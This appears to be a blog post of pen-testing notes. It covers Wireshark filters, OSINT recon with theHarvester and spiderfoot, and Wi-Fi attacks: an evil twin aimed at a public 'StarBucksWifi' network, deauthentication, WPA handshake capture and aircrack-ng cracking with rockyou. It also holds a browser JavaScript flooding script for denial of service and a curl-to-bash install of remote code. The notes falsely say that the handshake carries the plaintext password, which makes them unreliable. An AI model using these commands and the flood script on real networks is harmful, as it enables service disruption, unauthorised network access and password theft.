Pen Testing
Posted on February 1, 2015
Tags: hacksoft
1 wireshark
https://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf
- address filter
ip.addr == 192.168.1.1ip.src == 192.168.1.1ip.dst == 192.168.1.1ip.port == 80
- content filter
frame contains "bleh"- `frame matches “some (girl | boy | man)”
- len filter
frame.len > 10 && frame.len < 300
- http filter
http.request.method == "POST"http.response.code == 404
- protocols
- TCP , this is just https
- HTTP
- UDP , fast
- ARP, maps MAC addr to IP addr
- GUI techniques
- right click > Follow > TCP Stream
- File > Export Objects
dns.qry.name contains microsoft or dns.qry.name contains windows
http.request || http.response
http.request or ssl.handshake.type == 1.(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)
(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)2 Info Recon
Go to localhost:5009 and search emails, people, phone numbers
spiderfoot -l 127.0.0.1:5009Finds people or hidden site domains
1. Example finds 200 hits of subdomains using
theHarvester -d kali.org -l 200 -b bing
theHarvester -d "John Doe" -l 200 -b linkedinOther tools
- maltego - search for possible social network of target email
- twofi - list most used words of target twitter profile
- urlcrazy - list fat fingered domain names
3 Evil twin attack
sudo apt install hcxdumptool
sudo apt install hcxtoolsDownload pyrit
curl https://raw.githubusercontent.com/Grezzo/pyrit-installer-for-kali-rolling/main/install-pyrit-kali-rolling-2021-1.sh | bashsudo wifite -e StarBucksWifiRestore wifi
sudo airmon-ng stop wlan0monwifite
4 flooding network connection script
requires disabling of CORS in chrome browser
var CONCURRENCY_LIMIT = 500
var queue = []
async function fetchWithTimeout(resource, options) {
const controller = new AbortController();
const id = setTimeout(() => controller.abort(), options.timeout);
return fetch(resource, {
method: 'GET',
mode: 'no-cors',
signal: controller.signal
}).then((response) => {
clearTimeout(id);
return response;
}).catch((error) => {
clearTimeout(id);
throw error;
});
}
async function flood(target) {
for (var i = 0; ; ++i) {
if (queue.length > CONCURRENCY_LIMIT) {
await queue.shift()
}
rand = i % 3 === 0 ? '' : ('?' + Math.random() * 1000)
queue.push(
fetchWithTimeout(target + rand, { timeout: 1000 })
.catch((error) => {
if (error.code === 20 /* ABORT */) {
return;
}
targetStats[target].number_of_errored_responses++;
})
.then((response) => {
if (response && !response.ok) {
targetStats[target].number_of_errored_responses++;
}
targetStats[target].number_of_requests++;
})
)
}
}
// Start
targets.map(flood)5 Restoring network from monitor mode
sudo systemctl start NetworkManager.service 6 Very simple Wifi method
- WPS
- Evil twin
- Deauth
sudo airgeddonexport AIRGEDDON_CHECK_DEPENDENCIES=false
export AIRGEDDON_CHECK_UPDATES=false
export AIRGEDDON_SKIP_INTRO=true7 wifi 4-way handshake atk
iwconfig #find wifi interface which is wlan1
# lo no wireless extensions.
# eth0 no wireless extensions.
# wlan0 IEEE 802.11AC ESSID:"BobWifi" Nickname:"WIFI@XXXXXX"
# Mode:Managed Frequency:5.785 GHz Access Point: XX:XX:XX:XX:XX
# Bit Rate:434 Mb/s Sensitivity:0/0
# Retry:off RTS thr:off Fragment thr:off
# Power Management:off
# Link Quality=57/100 Signal level=-68 dBm Noise level=0 dBm
# Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
# Tx excessive retries:0 Invalid misc:0 Missed beacon:0
# wlan1 IEEE 802.11 ESSID:off/any
# Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
# Retry short limit:7 RTS thr:off Fragment thr:off
# Power Management:offsudo airmon-ng start wlan0 #start monitor mode
sudo airmon-ng #check monitor mode
# PHY Interface Driver Chipset
# phy0 wlan0 rtl8821cu Realtek Semiconductor Corp. 802.11ac NIC
# phy1 wlan1mon ath9k_htc Qualcomm Atheros Communications AR9271 802.11nsudo airodump-ng wlan0mon #Scan SSID and Channels
get BSSID get CH
# BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
# XX:XX:XX:XX:XX:XX -72 65 22 0 1 130 WPA2 CCMP PSK Bob
# XX:XX:XX:XX:XX:XX -75 42 3 0 10 360 WPA2 CCMP PSK Ace
# XX:XX:XX:XX:XX:XX -74 59 18 0 11 260 WPA2 CCMP PSK Gary ESSID = Gary
BSSID = XX:XX:XX:XX:XX:XX
CH = 11
Open 2 terminals
#1st terminal -> takes CH 11 and BSSID XX:XX:XX:XX:XX:XX as input
sudo airodump-ng -w GaryDump -c 11 --bssid XX:XX:XX:XX:XX:XX wlan1mon
#2nd terminal -> takes BSSID as input
sudo aireplay-ng --deauth 0 -a XX:XX:XX:XX:XX:XX wlan1mon CH 6 ][ Elapsed: 54 s ][ 2022-04-15 16:38 ][ WPA handshake: THIS IS OUR GOAL]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:XX:XX:XX:XX:XX -79 0 219 502 0 6 130 WPA2 CCMP PSK Gary
BSSID STATION PWR Rate Lost Frames Notes Probes
XX:XX:XX:XX:XX:XX A4:EA:1A:BA:BA:CA -79 1e- 1e 0 462 EAPOL Gary
XX:XX:XX:XX:XX:XX FA:A3:A3:AG:AA:A9 -80 0 - 6e 0 26 Theory
Open the wireshark GaryDump-01.cap
filter by “eapol”
Info
(Message 1 of 4)
(Message 2 of 4) <--
(Message 3 of 4)
(Message 4 of 4)Those packets are the 4 way WPA handshake
Message 2 of 4 shows us the WPA Key Data which is the password sent by the auto-connecting phone to the router.
Packet=[Source:Phone Destination:Router Protocol:EAPOL INFO:(Message 2 of 4)]
Frame 8086: ...
IEEE 802.11 ...
Logical-Link Control...
802.1X Authentication
Version: 802.1X-2001
Type: Key (3)
Length: 117
Key Descriptor Type: EAPOL RSN Key (2)
...
WPA Key Data: 91390283108123981298Bruteforcing
sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
aircrack-ng GaryDump-01.cap -w /usr/share/wordlists/rockyou.txt Aside: You can check if your own password is in the rockyou list with grep -i "mypass" /usr/share/wordlists/rockyou.txt
9 Evil twin
9.1 Checking password
aircrack-ng -a 2 -b ${bssid} -w "${tmpdir}${webdir}${currentpassfile}" "${et_handshake}"
